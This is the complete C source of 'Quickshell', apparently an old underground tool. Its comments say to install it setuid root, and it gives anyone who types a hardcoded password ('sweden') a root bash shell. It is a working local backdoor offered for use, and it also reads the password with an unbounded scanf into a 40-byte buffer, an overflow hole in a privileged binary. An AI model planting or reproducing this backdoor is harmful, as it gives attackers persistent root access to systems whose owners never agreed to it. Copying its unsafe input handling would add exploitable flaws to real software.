/*
Quickshell by TauCeti version 0.51
----------------------------------
After compiling, do a 'chown root qs; chmod a=rsx qs' (NOTE: You
have to have UID 0 to do this). This is easy coded shit, if you
don't have any usage with it, learn from it. */

#define PASSWORD "sweden" /* Put yer password here */
#include <stdio.h>
#include <stdlib.h>
main()
{
        char passtry[40];

        printf("\nQuickshell by TauCeti(redto@hotmail.com)\nEnter Password: ");
        scanf("%s",&passtry);
        if( strcmp(passtry, PASSWORD) == 0) {
        printf("\nAccess granted.\n");
        system("/bin/bash");
        exit(1);
        }
	printf("In the force if Yoda's is so strong, construct a sentence ");
	printf("with words in the proper order then why can't he?\n");
	exit(1);
}

